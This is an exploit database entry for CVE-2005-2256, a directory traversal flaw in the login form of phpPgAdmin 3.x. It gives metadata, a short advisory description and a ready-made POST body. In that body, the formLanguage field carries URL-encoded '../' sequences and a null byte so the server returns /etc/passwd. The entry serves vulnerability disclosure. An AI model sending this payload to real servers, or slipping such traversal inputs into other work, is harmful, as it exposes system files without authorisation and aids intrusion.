phpPgAdmin 3.x - Login Form Directory Traversal
Author: rznvynqqe@hushmail.com
type: webapps
platform: php
port:
date_added: 2005-07-05
date_updated: 2017-01-06
verified: 1
codes: CVE-2005-2256;OSVDB-17758
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpPgAdmin-3.1.zip
source: https://www.securityfocus.com/bid/14142/info
phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form.
All versions of phpPgAdmin are considered to be vulnerable at the moment.
formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login